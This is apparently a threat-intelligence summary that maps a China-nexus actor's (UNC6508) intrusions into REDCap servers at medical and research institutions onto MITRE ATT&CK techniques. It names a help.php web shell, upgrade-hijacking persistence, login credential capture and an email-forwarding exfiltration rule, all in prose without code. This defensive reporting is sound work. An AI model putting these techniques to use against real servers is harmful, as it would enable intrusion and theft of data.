Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research

MITRE Techniques

• [T1190] Exploit Public-Facing Application – UNC6508 gained access by exploiting exposed REDCap servers (‘exploited externally facing REDCap servers’).
• [T1505.003] Server Software Component: Web Shell – The actor deployed a web shell named help.php to maintain persistence and upload files (‘deployed a web shell named “help.php”‘).
• [T1554] Compromise Client Software Binary – INFINITERED modified legitimate REDCap files and intercepted the upgrade process to persist across versions (‘injects its code into new REDCap versions by intercepting the upgrade process’).
• [T1027] Obfuscated Files or Information – The malware used Base64 and GUID-delimited payloads to hide malicious logic (‘Base64 GUID delimiter’, ‘extract the malicious logic using GUID delimiter’).
• [T1090.003] Proxy: Multi-hop Proxy – UNC6508 routed activity through OBF networks, compromised routers, residential proxies, and VPS infrastructure (‘routing traffic from offensive operations through a mix of compromised routers, residential proxies, Virtual Private Servers’).
• [T1562.001] Impair Defenses: Disable or Modify Tools – The actor abused content compliance rules to silently forward emails and avoid normal user-visible handling (‘Silently “BCC-forward” matched emails’).
• [T1689] Downgrade Attack – UNC6508 probed for and abused vulnerable legacy REDCap versions side-by-side with newer ones (‘probing for these vulnerable legacy versions’).
• [T1555] Credentials from Password Stores – INFINITERED collected credentials from local REDCap storage and configuration data (‘hides inside a local REDCap sessions database table’).
• [T1056.003] Input Capture: Web Portal Capture – The credential harvester captured usernames and passwords submitted through the login page (‘captures usernames and passwords submitted via POST requests during the login process’).
• [T1114.003] Email Collection: Email Forwarding Rule – UNC6508 created a compliance rule named “Patroit” to forward matching messages to attacker-controlled email (‘used regular expressions to match … emails’).
• [T1213] Data from Information Repositories – The actor searched emails and other data for strategic intelligence keywords (‘matching on keyword and email address patterns in sent or received emails’).
• [T1071.001] Application Layer Protocol: Web Protocols – INFINITERED used HTTP cookie parameters for command-and-control traffic (‘REDCAP-TOKEN’ cookie parameter).
• [T1567] Exfiltration Over Web Service – Exfiltrated emails were forwarded to a Gmail account controlled by the threat actor (‘BCC-forwarded to a threat actor-controlled Gmail address’).
• [T1071.001] Application Layer Protocol: Web Protocols – The malware returned system information and received commands through HTTP-based cookie communication (‘beacons system information’ and ‘parse the payload for command tags’).